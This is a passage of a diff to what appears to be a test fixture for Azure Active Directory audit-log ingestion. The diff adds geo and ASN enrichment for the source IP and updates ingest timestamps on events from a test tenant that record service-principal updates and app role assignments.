c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla
/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7823970Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793206\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"606ae654-e71e-4a6b-a07c-85acd775667b\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -4599,6 +4899,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -4765,7 +5077,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124980600Z", + "ingested": "2021-12-14T14:48:43.176652120Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -4792,6 +5104,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -4958,7 +5282,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124987500Z", + "ingested": "2021-12-14T14:48:43.176653071Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -4985,6 +5309,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -5151,7 +5487,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124994100Z", + "ingested": "2021-12-14T14:48:43.176653690Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -5178,6 +5514,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -5344,7 +5692,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124999500Z", + "ingested": "2021-12-14T14:48:43.176654355Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
